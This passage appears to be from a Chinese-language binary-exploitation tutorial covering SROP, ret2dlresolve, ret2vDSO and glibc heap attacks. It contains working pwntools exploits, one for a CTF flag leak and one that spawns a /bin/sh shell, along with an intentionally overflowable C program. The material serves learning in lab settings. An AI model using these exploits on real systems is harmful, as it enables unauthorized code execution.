想办法令目标程序执行 sigreturn，进行信号处理。
调用 sigreturn 后，系统会暂停当前程序的执行，通过 Signal Handler 处理信号，处理完后根据 sigcontext 的内容恢复运行环境。
这时候我们已经达成了设置参数的目的，可以选择返回到 ROP Chain 继续执行恶意代码。

正常情况下当遇到需要处理信号的时候，kernel 会在栈上创建一个新的栈帧，并生成一个 sigcontext 结构保存在新的栈帧中，sigcontext 本质上就是一个对执行信号处理函数前的运行环境的快照，以便之后恢复到执行信号处理函数之前的环境接着运行；接着切换上下文到 Signal Handler 中进行信号处理工作；当信号不再被阻塞时，sigreturn 会根据栈中保存的 sigcontext 弹出所有寄存器的值，有效地将寄存器还原为执行信号处理之前的状态。

那对于我们主动诱导程序去执行 sigreturn 的这种非正常情况，栈上肯定是不会有 kernel 生成的 sigcontext 结构的，我就问你你能不能在栈上伪造一个 sigcontext 出来？嘿嘿。

敏锐的你现在是不是想跳起来惊呼，这是不是好比核武器？没错，通过伪造 sigcontext 你可以一次控制所有寄存器的值，SO FUCKING POWERFUL!

不幸的是这也是它的缺点所在……如果你不能泄漏栈值，就无法为 RSP 等寄存器设置一个有效的值，这或许是个棘手的问题。但无论如何，这都是一个强大的 trick, 尤其是在可用的 gadgets 有限的情况下。

用于恢复状态的 sigcontext 的结构如下 (基于 x86_64)：

+--------------------+--------------------+
| rt_sigeturn()      | uc_flags           |
+--------------------+--------------------+
| &uc                | uc_stack.ss_sp     |
+--------------------+--------------------+
| uc_stack.ss_flags  | uc.stack.ss_size   |
+--------------------+--------------------+
| r8                 | r9                 |
+--------------------+--------------------+
| r10                | r11                |
+--------------------+--------------------+
| r12                | r13                |
+--------------------+--------------------+
| r14                | r15                |
+--------------------+--------------------+
| rdi                | rsi                |
+--------------------+--------------------+
| rbp                | rbx                |
+--------------------+--------------------+
| rdx                | rax                |
+--------------------+--------------------+
| rcx                | rsp                |
+--------------------+--------------------+
| rip                | eflags             |
+--------------------+--------------------+
| cs / gs / fs       | err                |
+--------------------+--------------------+
| trapno             | oldmask (unused)   |
+--------------------+--------------------+
| cr2 (segfault addr)| &fpstate           |
+--------------------+--------------------+
| __reserved         | sigmask            |
+--------------------+--------------------+

有关 SROP 的演示，这里还有一个视频讲的也很好，强推给你！

Example

好了，知道了这些基础概念后，下面就通过 Backdoor CTF 2017 的 Fun Signals 这道题来实战一下吧～

.shellcode:0000000010000000                     .686p
.shellcode:0000000010000000                     .mmx
.shellcode:0000000010000000                     .model flat
.shellcode:0000000010000000     .intel_syntax noprefix
.shellcode:0000000010000000
.shellcode:0000000010000000     ; ===========================================================================
.shellcode:0000000010000000
.shellcode:0000000010000000     ; Segment type: Pure code
.shellcode:0000000010000000     ; Segment permissions: Read/Write/Execute
.shellcode:0000000010000000     _shellcode      segment byte public 'CODE' use64
.shellcode:0000000010000000                     assume cs:_shellcode
.shellcode:0000000010000000                     ;org 10000000h
.shellcode:0000000010000000                     assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
.shellcode:0000000010000000
.shellcode:0000000010000000                     public _start
.shellcode:0000000010000000     _start:                                 ; Alternative name is '_start'
.shellcode:0000000010000000                     xor     eax, eax        ; __start
.shellcode:0000000010000002                     xor     edi, edi        ; Logical Exclusive OR
.shellcode:0000000010000004                     xor     edx, edx        ; Logical Exclusive OR
.shellcode:0000000010000006                     mov     dh, 4
.shellcode:0000000010000008                     mov     rsi, rsp
.shellcode:000000001000000B                     syscall                 ; LINUX - sys_read
.shellcode:000000001000000D                     xor     edi, edi        ; Logical Exclusive OR
.shellcode:000000001000000F                     push    0Fh
.shellcode:0000000010000011                     pop     rax
.shellcode:0000000010000012                     syscall                 ; LINUX - sys_rt_sigreturn
.shellcode:0000000010000014                     int     3               ; Trap to Debugger
.shellcode:0000000010000015
.shellcode:0000000010000015     syscall:                                ; LINUX - sys_rt_sigreturn
.shellcode:0000000010000015                     syscall
.shellcode:0000000010000017                     xor     rdi, rdi        ; Logical Exclusive OR
.shellcode:000000001000001A                     mov     rax, 3Ch ; '<'
.shellcode:0000000010000021                     syscall                 ; LINUX - sys_exit
.shellcode:0000000010000021     ; ---------------------------------------------------------------------------
.shellcode:0000000010000023     flag            db 'fake_flag_here_as_original_is_at_server',0
.shellcode:0000000010000023     _shellcode      ends
.shellcode:0000000010000023

可以看到这是一个非常简单的程序，单纯的就是为了考 SROP，以至于出题人都直接手撸汇编了。

注意到 flag 被硬编码在 0x10000023 这个位置了，所以我们的目标就是输出这个地址处的内容。由于这个程序没开 ASLR 什么的保护，拿下它还是非常轻松的。

简单分析一下这个程序，我们知道它在第一个 syscall 处调用了 read，从 stdin 读取了 0x400 bytes 到栈上。紧接着第二个 syscall 直接帮我们调用了 rt_sigreturn，那就不用我们自己动手了，我们只要伪造并发送 sigcontext 栈帧即可。思路是伪造一个 SYS_write 的调用，将 flag 输出到 stdout。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import (
    ELF,
    ROP,
    SigreturnFrame,
    constants,
    context,
    gdb,
    log,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./funsignals_player_bin"
HOST, PORT = "localhost", 1337

gdbscript = """
b *_start+11
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload():
    flag_address = 0x10000023

    rop = ROP(elf)

    syscall = rop.syscall.address

    frame = SigreturnFrame()

    frame.rdi = 0x1
    frame.rsi = flag_address
    frame.rdx = 0x1337
    frame.rax = constants.SYS_write
    frame.rip = syscall

    return bytes(frame)


def attack(target):
    try:
        payload = construct_payload()

        target.send(payload)

        response = target.recvall(timeout=3)

        if b"flag" in response:
            log.success(response[:0x27].decode("ascii"))

            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Summary

总结：有的时候你的 ROP Chain 可能会缺少一些必要的 gadgets，导致无法设定某些后续攻击代码需要用到的参数，这时候就可以考虑使用 SROP 来控制寄存器。当然，使用 SROP 也是有条件的，比如你起码得有 syscall 这个 gadget，并且能控制 rax 的值为 sigreturn 的系统调用号，还有一点也很重要，就是 rsp 必须指向伪造的 frame 。

[!TIP] 要知道 rax 是一个特殊的寄存器，通常用于保存函数的返回值。所以当我说控制 rax 的值时，你不一定非得通过某些 gadgets 来实现这一点，有时候程序本身就可以为你设置好它，比如 read 函数会返回读到的字节数。

References

ret2dlresolve

Principle

对于 dynamically linked 的程序，当它第一次调用共享库中的函数时，动态链接器（如 ld-linux-x86-64.so.2）会通过 _dl_runtime_resolve 函数动态解析共享库中符号的地址，并将解析出来的实际地址保存到 GOT (Global Offset Table) 中，这样下次调用这个函数就不需要再次解析，可以直接通过全局偏移表进行跳转。

以上流程我们称之为重定位 (Relocation)。

具体重定位流程以及为什么需要重定位，不同 RELRO 保护级别之间的区别之类的，我之后再单独开一个小标题来写，这里先占个坑。

_dl_runtime_resolve 函数从栈中获取对一些它需要的结构的引用，以便解析指定的符号。因此攻击者通过伪造这个结构就可以劫持 _dl_runtime_resolve 让它去解析任意符号地址。

Example

我们就以 pwntools 官方文档里面提供的示例程序来学习 how to ret2dlresolve. 其实就是学一下如何使用它提供的自动化工具……有关如何手动伪造 _dl_runtime_resolve 所需的结构体，以及一些更深入的话题，我之后应该还会回来填这个坑，先立 flag 了哈哈哈。

示例程序来源于 pwnlib.rop.ret2dlresolve — Return to dl_resolve，通过下面这条指令来编译：

gcc ret2dlresolve.c -o ret2dlresolve \
    -fno-stack-protector \
    -no-pie

pwntools 官方文档里给我们的程序源码是这样的：

#include <unistd.h>

void vuln(void) {
  char buf[64];

  read(STDIN_FILENO, buf, 200);
}

int main(int argc, char **argv) { vuln(); }

但是编译出来后发现真 TM 坑，没有控制前三个参数的 gadgets，导致我们不能写入伪造的结构体……所以为了实验的顺利进行，我只得手动插入几个 gadgets 了：

#include <unistd.h>

void free_gadgets() {
  __asm__("pop %rdi; ret");
  __asm__("pop %rsi; ret");
  __asm__("pop %rdx; ret");
}

void vuln(void) {
  char buf[64];

  read(STDIN_FILENO, buf, 200);
}

int main(int argc, char **argv) { vuln(); }

程序很简单，从 stdin 读取了 200 字节数据到 buf，由于 buf 只有可怜的 64 字节空间，故存在 136 字节溢出空间。空间如此之充裕，让我们有足够的余地来编排一曲邪恶的代码交响乐，演绎攻击者的狂想曲。

我们的目标是通过 ret2dlresolve 技术来 getshell. 思路大致应该是：将伪造的用于解析 system 符号的结构体放到一个 rw 空间，并提前设置好 system 函数要用到的参数，也就是将 rdi 设为 /bin/sh 字符串的地址。接着在栈上布置我们伪造的结构的地址，以便 _dl_runtime_resolve 引用我们伪造的这个结构体来解析符号。现在我们调用 _dl_runtime_resolve 就会解析出 system 的地址，根据我们先前设置好的参数，程序会乖乖的 spawn a shell.

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import (
    ELF,
    ROP,
    Ret2dlresolvePayload,
    context,
    flat,
    gdb,
    log,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./ret2dlresolve"
HOST, PORT = "localhost", 1337

gdbscript = """
b *vuln+25
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(padding_to_ret, first_read_size):
    dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])
    fake_structure = dlresolve.payload

    rop = ROP(elf)

    rop.read(0, dlresolve.data_addr, len(fake_structure))
    rop.raw(rop.ret.address)
    rop.ret2dlresolve(dlresolve)

    log.success(rop.dump())

    raw_rop = rop.chain()

    return flat({padding_to_ret: raw_rop, first_read_size: fake_structure})


def attack(target):
    try:
        payload = construct_payload(0x48, 0xC8)

        target.sendline(payload)
        target.interactive()
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            attack(target)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Summary

当没有可用的 syscall gadgets 来实现 ret2syscall 或 SROP，并且没有办法泄漏 libc 地址时，可以考虑 ret2dlresolve。

References

ret2vDSO

Principle

vDSO (Virtual Dynamic Shared Object) 是 Linux 内核为用户态程序提供的一个特殊共享库，注意它是虚拟的，本身并不存在，它做的只是将一些常用的内核态调用映射到用户地址空间。这么做的目的是为了加速系统调用，避免频繁地从用户态切换到内核态，有效的减少了切换带来的巨大开销。

在 vDSO 区域可能存在一些 gadgets，用于从用户态切换到内核态。我们关注的就是这块区域里有没有什么可供我们利用的 gadgets，通常需要手动把 vDSO dump 出来分析。

Example

崩溃了兄弟，我自己出了一道题然后折腾了两天做不出来……我好菜啊……受到致命心理打击。例题等我缓过来再说吧，估计一年都不想碰这个了……反正只要知道 vDSO 区域里面存在一些可用的 gadgets 就好了，剩下的和普通 ROP 没啥区别。

示范一下怎么通过 gdb dump 出 vDSO：

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File
    0x555555554000     0x555555555000 r--p     1000      0 /home/cub3y0nd/Projects/ret2vDSO/ret2vDSO
    0x555555555000     0x555555556000 r-xp     1000   1000 /home/cub3y0nd/Projects/ret2vDSO/ret2vDSO
    0x555555556000     0x555555557000 r--p     1000   2000 /home/cub3y0nd/Projects/ret2vDSO/ret2vDSO
    0x7ffff7fbf000     0x7ffff7fc1000 rw-p     2000      0 [anon_7ffff7fbf]
    0x7ffff7fc1000     0x7ffff7fc5000 r--p     4000      0 [vvar]
    0x7ffff7fc5000     0x7ffff7fc7000 r-xp     2000      0 [vdso]
    0x7ffff7fc7000     0x7ffff7fc8000 r--p     1000      0 /usr/lib/ld-linux-x86-64.so.2
    0x7ffff7fc8000     0x7ffff7ff1000 r-xp    29000   1000 /usr/lib/ld-linux-x86-64.so.2
    0x7ffff7ff1000     0x7ffff7ffb000 r--p     a000  2a000 /usr/lib/ld-linux-x86-64.so.2
    0x7ffff7ffb000     0x7ffff7fff000 rw-p     4000  34000 /usr/lib/ld-linux-x86-64.so.2
    0x7ffffffde000     0x7ffffffff000 rw-p    21000      0 [stack]
0xffffffffff600000 0xffffffffff601000 --xp     1000      0 [vsyscall]
pwndbg> dump memory vdso.so 0x7ffff7fc5000 0x7ffff7fc7000

用 ROPgadget 分析 dump 出来的文件，大概那么一看有将近 500 个 gadgets，不过好像并不是很实用呢？感觉用这个 trick 性价比不高，不过也是一个值得尝试的方法。

嗯……再来介绍个好东西，叫 ELF Auxiliary Vectors (AUXV)，ELF 辅助向量。它是内核在加载 ELF 可执行文件时传递给用户态程序的一组键值对。包含了与程序运行环境相关的底层信息，例如系统调用接口位置、内存布局、硬件能力等。

当一个程序被加载时，Linux 内核将参数数量 (argc)、参数 (argv)、环境变量 (envp) 以及 AUXV 结构传递给程序的入口函数。程序可以通过系统提供的 getauxval 访问这些辅助向量，以获取系统信息。

看看当前最新的 v6.14-rc1 内核中有关它的定义（旧版本中有关它的定义在 elf.h 中）：

/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef _UAPI_LINUX_AUXVEC_H
#define _UAPI_LINUX_AUXVEC_H

#include <asm/auxvec.h>

/* Symbolic values for the entries in the auxiliary table
   put on the initial stack */
#define AT_NULL   0 /* end of vector */
#define AT_IGNORE 1 /* entry should be ignored */
#define AT_EXECFD 2 /* file descriptor of program */
#define AT_PHDR   3 /* program headers for program */
#define AT_PHENT  4 /* size of program header entry */
#define AT_PHNUM  5 /* number of program headers */
#define AT_PAGESZ 6 /* system page size */
#define AT_BASE   7 /* base address of interpreter */
#define AT_FLAGS  8 /* flags */
#define AT_ENTRY  9 /* entry point of program */
#define AT_NOTELF 10 /* program is not ELF */
#define AT_UID    11 /* real uid */
#define AT_EUID   12 /* effective uid */
#define AT_GID    13 /* real gid */
#define AT_EGID   14 /* effective gid */
#define AT_PLATFORM 15  /* string identifying CPU for optimizations */
#define AT_HWCAP  16    /* arch dependent hints at CPU capabilities */
#define AT_CLKTCK 17 /* frequency at which times() increments */
/* AT_* values 18 through 22 are reserved */
#define AT_SECURE 23   /* secure mode boolean */
#define AT_BASE_PLATFORM 24 /* string identifying real platform, may
     * differ from AT_PLATFORM. */
#define AT_RANDOM 25 /* address of 16 random bytes */
#define AT_HWCAP2 26 /* extension of AT_HWCAP */
#define AT_RSEQ_FEATURE_SIZE 27 /* rseq supported feature size */
#define AT_RSEQ_ALIGN  28 /* rseq allocation alignment */
#define AT_HWCAP3 29 /* extension of AT_HWCAP */
#define AT_HWCAP4 30 /* extension of AT_HWCAP */

#define AT_EXECFN  31 /* filename of program */

#ifndef AT_MINSIGSTKSZ
#define AT_MINSIGSTKSZ 51 /* minimal stack size for signal delivery */
#endif

#endif /* _UAPI_LINUX_AUXVEC_H */

对于特定的架构可能还有一些特别的宏定义：

/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef _ASM_X86_AUXVEC_H
#define _ASM_X86_AUXVEC_H
/*
 * Architecture-neutral AT_ values in 0-17, leave some room
 * for more of them, start the x86-specific ones at 32.
 */
#ifdef __i386__
#define AT_SYSINFO 32
#endif
#define AT_SYSINFO_EHDR 33

/* entries in ARCH_DLINFO: */
#if defined(CONFIG_IA32_EMULATION) || !defined(CONFIG_X86_64)
# define AT_VECTOR_SIZE_ARCH 3
#else /* else it's non-compat x86-64 */
# define AT_VECTOR_SIZE_ARCH 2
#endif

#endif /* _ASM_X86_AUXVEC_H */

以上所有内容的参考链接我都放在末尾的 References 了，感兴趣的自行查阅。

我们可以通过指定 LD_SHOW_AUXV=1 来查看程序的 AUXV 信息：

λ ~/ LD_SHOW_AUXV=1 w
AT_SYSINFO_EHDR:      0x7f92c06b9000
AT_MINSIGSTKSZ:       1776
AT_HWCAP:             178bfbff
AT_PAGESZ:            4096
AT_CLKTCK:            100
AT_PHDR:              0x626d19090040
AT_PHENT:             56
AT_PHNUM:             13
AT_BASE:              0x7f92c06bb000
AT_FLAGS:             0x0
AT_ENTRY:             0x626d19092940
AT_UID:               1000
AT_EUID:              1000
AT_GID:               1000
AT_EGID:              1000
AT_SECURE:            0
AT_RANDOM:            0x7ffca3edf4e9
AT_HWCAP2:            0x2
AT_EXECFN:            /usr/bin/w
AT_PLATFORM:          x86_64
AT_RSEQ_FEATURE_SIZE: 28
AT_RSEQ_ALIGN:        32
 14:19:59 up  3:54,  1 user,  load average: 0.52, 0.57, 0.59
USER     TTY       LOGIN@   IDLE   JCPU   PCPU  WHAT
cub3y0nd tty1      10:26    3:53m  6:43    ?    xinit /home/cub3y0nd/.xinitrc -- /etc/X11/xinit/xs

注意到这个变量是以 LD_ 开头的，说明动态链接器会负责解析这个变量，因此，如果程序是静态链接的，那使用这个变量将不会得到任何输出。

但是得不到输出不代表它没有，用 pwndbg 的 i auxv 或 auxv 也可以查看程序的 AUXV 信息（或者你手动 telescope stack）：

pwndbg> i auxv
33   AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7ffd000
51   AT_MINSIGSTKSZ       Minimum stack size for signal delivery 0x6f0
16   AT_HWCAP             Machine-dependent CPU capability hints 0x178bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x400040
4    AT_PHENT             Size of program header entry   56
5    AT_PHNUM             Number of program headers      6
7    AT_BASE              Base address of interpreter    0x0
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x40101d
11   AT_UID               Real user ID                   1000
12   AT_EUID              Effective user ID              1000
13   AT_GID               Real group ID                  1000
14   AT_EGID              Effective group ID             1000
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0x7fffffffe789
26   AT_HWCAP2            Extension of AT_HWCAP          0x2
31   AT_EXECFN            File name of executable        0x7fffffffefce "/home/cub3y0nd/Projects/ret2vDSO/ret2vDSO"
15   AT_PLATFORM          String identifying platform    0x7fffffffe799 "x86_64"
27   AT_RSEQ_FEATURE_SIZE rseq supported feature size    28
28   AT_RSEQ_ALIGN        rseq allocation alignment      32
0    AT_NULL              End of vector                  0x0

这之中我们最关心的应该是 AT_SYSINFO_EHDR，它与 vDSO 的起始地址相同。因此，只要能把它泄漏出来，我们就可以掌握 vDSO 的 gadgets 了。

其中 AT_RANDOM 好像也是一个很实用的东西，等我有空了再好好研究研究这些，话说这是我立的第几个 flag 了……

一般程序的返回地址之后紧接着的就是 argc，然后是 argv，再之后就是 envp，最后还有一堆信息，它们就是 AUXV 了，这些都在栈上保存，自己研究去吧，我心好累……

Summary

反正我感觉这是一个性价比不怎么高的 trick，不过要是实在没办法搞到可用的 gadgets 的话还是可以考虑一下的。

References

Try-Catch, Catch Me If You Can

这是关于 (CHOP) Catch Handler Oriented Programming 的，我单独写了一篇博客，请移步 CHOP Suey: 端上异常处理的攻击盛宴。

当 gadgets 缺席：Who needs "pop rdi" when you have gets() ?

由于篇幅不小，所以有关这个 trick 我也单独分离出来了一篇博客，请移步无 gadgets 也能翻盘：ret2gets 能否成为核武器？

薛定谔的 free chunks: Double Free, Double Fun ?

:::tip 基于 glibc-2.31 的源码。 :::

宏观上来看，程序调用 free 函数首先会进入 __libc_free，在这里主要是做了一些初始化工作，诸如看看有没有 __free_hook、是不是 mmap 出来的、初始化 tcache_perthread_struct 等。然后调用 _int_free 函数，这个函数才是真正负责分门别类，确定最终我们 free 的 chunk 应该被放到哪里的地方。

Related Structures / Macros Definitions

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry {
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct {
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

Related Functions

先看看被 free 的 chunk 是怎么被放入 tcachebin 的：

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void tcache_put(mchunkptr chunk, size_t tc_idx) {
  tcache_entry *e = (tcache_entry *)chunk2mem(chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

当 chunk 被放入 tcache 时，glibc 会把 data 部分视作 tcache_entry
之后将当前线程的 tcache_perthread_struct 结构体地址写入到 key 字段（与 bk 重叠）
接着设置 next 字段指向当前 tcachebin 中的下一个 free chunk（与 fd 重叠）
然后将当前 tcachebin 的 header 设为这个新放入的 chunk
增加此 bin 的 counts

然后再看 double free 检查：

#if USE_TCACHE
{
  size_t tc_idx = csize2tidx(size);
  if (tcache != NULL && tc_idx < mp_.tcache_bins) {
    /* Check to see if it's already in the tcache.  */
    tcache_entry *e = (tcache_entry *)chunk2mem(p);

    /* This test succeeds on double free.  However, we don't 100%
       trust it (it also matches random payload data at a 1 in
       2^<size_t> chance), so verify it's not an unlikely
       coincidence before aborting.  */
    if (__glibc_unlikely(e->key == tcache)) {
      tcache_entry *tmp;
      LIBC_PROBE(memory_tcache_double_free, 2, e, tc_idx);
      for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
        if (tmp == e)
          malloc_printerr("free(): double free detected in tcache 2");
      /* If we get here, it was a coincidence.  We've wasted a
         few cycles, but don't abort.  */
    }

    if (tcache->counts[tc_idx] < mp_.tcache_count) {
      tcache_put(p, tc_idx);
      return;
    }
  }
}
#endif

这里就只讲关键部分了。首先它将我们要 free 的 chunk 的 data 部分转换为了 tcache_entry 结构体，使用 e 指代。如果 e->key == tcache 的话，就怀疑是不是有 double free 的风险，因为我们知道，当第一次 free 时，glibc 会写 e->key = tcache。但并不能因此而直接下定论说这就是一个 double free，因为用户写入的数据有概率正巧等于 tcache，虽说只有 1/2^<size_t> 的极小概率，但也不能忽略。所以还需要做进一步检查，确定我们要 free 的 chunk 是否已经存在于 tcachebin 中了，于是就进入 for 循环，对这个 tcachebin 中的每一个 free chunk 做判断，如果它与 e 相同，则说明确实触发了 double free 。

那么为了绕过 double free，可行的方案可能有：

把 key 改成非 tcache 值，让第一步检查失效
篡改 next 指针，让遍历不到目标 chunk，从而绕过第二步的 in list 检查

解链之诗：堆上咒语的逆诵

Safe-linking

从 glibc-2.32 开始，引入了 safe-linking 这一 mitigation，用于保护单向链表（tcache 和 fastbin），原理是 mangling fd 指针，使其更难因为被任意值覆盖而导致一系列的漏洞利用。

直接看代码好了，因为这又是一个及其简单的 mitigation，但却和历史上许多简单的设计一样，起到了非凡的效果……每次碰到这种简单的东西都会让我由衷地感慨，这又怎么不算是人类的智慧之光呢？~OrZ~

下面我引用的是当前最新的 glibc-2.42 的源码：

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

可以看到新加入了两个 macro，分别是用来 mangling 的 PROTECT_PTR 和用来 de-mangling 的 REVEAL_PTR。

右移 12 bits 是为了只保留 ASLR 部分，丢弃了固定的偏移位。PROTECT_PTR 中，pos 代表当前 chunk 的 fd 的地址，ptr 代表 fd 指向的地址，也就是当前 bin 中的第一个元素，所以一开始 bin 中没有元素的时候它为 NULL。这个的话我觉得可以自己去读一遍源码，一目了然。

~至于怎么 bypass，相信聪明的你一定会自己研究明白的，不对吗？~

:::tip XOR 是可逆运算。 :::

Alignment Check

除了 safe-linking 外，对于我们能 malloc / free 的 chunk 还新增了一个对齐检查：

/* Check if m has acceptable alignment */

#define misaligned_mem(m)  ((uintptr_t)(m) & MALLOC_ALIGN_MASK)

#define misaligned_chunk(p) (misaligned_mem( chunk2mem (p)))

其中，tcache 用的是 misaligned_mem，而 fastbin 用的则是 misaligned_chunk，这是因为 tcache bin 中存储的都是 user data，而 fastbin 中存储的都是从 chunk header 开始的地址。不过不管用哪个，最后检查的都是 user data 的地址是否是对齐的，要求是 & MALLOC_ALIGN_MASK == 0，通常就是 & 0xf == 0，也就是 16 字节对齐，即低 4 bits 为 0，这就导致攻击者无法将其篡改为任意地址，更多的时候可能需要用临近地址替代来达到目的。

Mirror, Mirror on the Heap

这里主要是想写一下 overlapping 这个 trick，概念非常简单，直接看代码吧，这里参考的是当前最新的 glibc-2.42 的代码。

/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))

/* Like chunksize, but do not mask SIZE_BITS.  */
#define chunksize_nomask(p) ((p)->mchunk_size)

/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))

/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
#define prev_size(p) ((p)->mchunk_prev_size)

/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))

/* extract p's inuse bit */
#define inuse(p)                                                              \
  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)

由于过于简单，我就不细写解析了，简单来说就是要去理解一下它是怎么通过 chunk header 来定位前后 chunk 的，以及怎么判断当前 chunk 是否处于 free 状态。

因此只要我们能篡改 chunk size 就可以让它 malloc / free 涵盖到更大的范围，称为 chunk extend，也叫做 chunk overlapping 。当然，也可以反过来，把这个大小改小可以实现一个 chunk shrink 的操作。

Doubly Linked, Doubly Doomed

这里只看高版本 unlink 利用，参考的是 how2heap 中的 glibc_2.35/unsafe_unlink，低版本同理，不过更简单。

思路是先创建两个 chunk，在 chunk 0 中创建一个 fake chunk，并且改变 chunk 1 的 metadata，修改它的 prev_size 为 fake chunk 的 chunk_size，并修改它的 chunk_size 的 prev_inuse bit 为 0，这样一来我们 free chunk 1 的时候它就会认为上一个 chunk 是 free'd 状态，会进行 backward consolidation，将 chunk 1 与 fake chunk 进行合并，即对 fake chunk 进行 unlink 。

free 判断是否需要合并的代码如下（这里只高亮了 example 中会进入的逻辑，具体情况还需要自己具体分析）：

  /*
    Consolidate other non-mmapped chunks as they arrive.
  */

  else if (!chunk_is_mmapped(p)) {

    /* If we're single-threaded, don't lock the arena.  */
    if (SINGLE_THREAD_P)
      have_lock = true;

    if (!have_lock)
      __libc_lock_lock (av->mutex);

    nextchunk = chunk_at_offset(p, size);

    /* Lightweight tests: check whether the block is already the
       top block.  */
    if (__glibc_unlikely (p == av->top))
      malloc_printerr ("double free or corruption (top)");
    /* Or whether the next chunk is beyond the boundaries of the arena.  */
    if (__builtin_expect (contiguous (av)
     && (char *) nextchunk
     >= ((char *) av->top + chunksize(av->top)), 0))
 malloc_printerr ("double free or corruption (out)");
    /* Or whether the block is actually not marked used.  */
    if (__glibc_unlikely (!prev_inuse(nextchunk)))
      malloc_printerr ("double free or corruption (!prev)");

    nextsize = chunksize(nextchunk);
    if (__builtin_expect (chunksize_nomask (nextchunk) <= CHUNK_HDR_SZ, 0)
 || __builtin_expect (nextsize >= av->system_mem, 0))
      malloc_printerr ("free(): invalid next size (normal)");

    free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);

    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

    if (nextchunk != av->top) {
      /* get and clear inuse bit */
      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

      /* consolidate forward */
      if (!nextinuse) {
 unlink_chunk (av, nextchunk);
 size += nextsize;
      } else
 clear_inuse_bit_at_offset(nextchunk, 0);

      /*
 Place the chunk in unsorted chunk list. Chunks are
 not placed into regular bins until after they have
 been given one chance to be used in malloc.
      */

      bck = unsorted_chunks(av);
      fwd = bck->fd;
      if (__glibc_unlikely (fwd->bk != bck))
 malloc_printerr ("free(): corrupted unsorted chunks");
      p->fd = fwd;
      p->bk = bck;
      if (!in_smallbin_range(size))
 {
   p->fd_nextsize = NULL;
   p->bk_nextsize = NULL;
 }
      bck->fd = p;
      fwd->bk = p;

      set_head(p, size | PREV_INUSE);
      set_foot(p, size);

      check_free_chunk(av, p);
    }

